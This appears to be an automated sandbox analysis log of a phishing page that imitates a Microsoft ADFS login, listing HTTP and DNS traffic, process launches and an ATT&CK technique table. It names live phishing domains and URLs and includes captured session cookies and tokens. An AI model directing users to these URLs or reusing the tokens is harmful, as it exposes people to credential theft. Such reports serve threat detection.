      Source: global trafficHTTP traffic detected: GET /adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3 HTTP/1.1Host: rutaann.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA; ai_user=j4ODj|2025-03-25T20:29:54.636Z; ai_session=mqSRh|1742934594637.7|1742934594637.7
      Source: global trafficHTTP traffic detected: GET /v2/track HTTP/1.1Host: dc.services.visualstudio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /v2/track HTTP/1.1Host: dc.services.visualstudio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /adfs/portal/css/style.css?id=A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC37 HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA; ai_user=j4ODj|2025-03-25T20:29:54.636Z; ai_session=mqSRh|1742934594637.7|1742934594637.7
      Source: global trafficHTTP traffic detected: GET /v2/track HTTP/1.1Host: dc.services.visualstudio.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
      Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: proposaldocumentsviasecuredport.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: sso.ninerscorretora.com.br
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: rutaann.com
      Source: global trafficDNS traffic detected: DNS query: dc.services.visualstudio.com
      Source: unknownHTTP traffic detected: POST /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1Host: proposaldocumentsviasecuredport.comConnection: keep-aliveContent-Length: 22sec-ch-ua-platform: "Windows"X-Requested-TimeStamp-Combination: X-Requested-TimeStamp: X-Requested-Type-Combination: GETsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0jOTHbG-PGUIL0SGVl0fMm1ogiY0: 44282349X-Requested-with: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36X-Requested-Type: GETContent-type: application/x-www-form-urlencodedX-Requested-TimeStamp-Expire: Accept: */*Origin: https://proposaldocumentsviasecuredport.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 20:29:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-XSS-Protection: 1; mode=blockCache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutablePragma: publicCF-Cache-Status: HITAge: 103391Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sBAgcOpK86giaC%2Fx9qnmphHzWfkaIF8kEQYWigUtpsbwtXcvezGaMJDfavhkUT7fa9lAPo7RL532xcc4rdRZ0RGlNk2gbe6lz45dGker0C7fhN0HH9dIYUxZ%2FgEsgF4LHgbFVgjdcEILD9Rz%2FUbAus5ZDTouVg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9261290ee8636a52-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=111530&min_rtt=105779&rtt_var=30964&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1640&delivery_rate=30231&cwnd=247&unsent_bytes=0&cid=124af88d4635b1c1&ts=285&x=0"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 507d20bb-5a36-4645-9fd1-8bd2f4613b00x-ms-ests-server: 2.1.20329.5 - WEULR1 ProdSlicesnel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-Dj4gipNEiZPC66EG2Uq7Cw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-AllDate: Tue, 25 Mar 2025 20:29:49 GMTConnection: closeContent-Length: 0Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
      Source: chromecache_80.2.drString found in binary or memory: http://knockoutjs.com/
      Source: chromecache_80.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
      Source: chromecache_80.2.drString found in binary or memory: https://github.com/douglascrockford/JSON-js
      Source: chromecache_74.2.drString found in binary or memory: https://sso.ninerscorretora.com.br/?mjalaytm&email=
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.4:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.92.117:443 -> 192.168.2.4:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.92.117:443 -> 192.168.2.4:49726 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.192.251:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49780 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49786 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49789 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49790 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49802 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir1132_31458539Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir1132_31458539Jump to behavior
      Source: classification engineClassification label: mal56.phis.win@25/34@26/8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2204,i,2051777256994672153,7090731593673493070,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2272 /prefetch:3
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2204,i,2051777256994672153,7090731593673493070,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2272 /prefetch:3Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
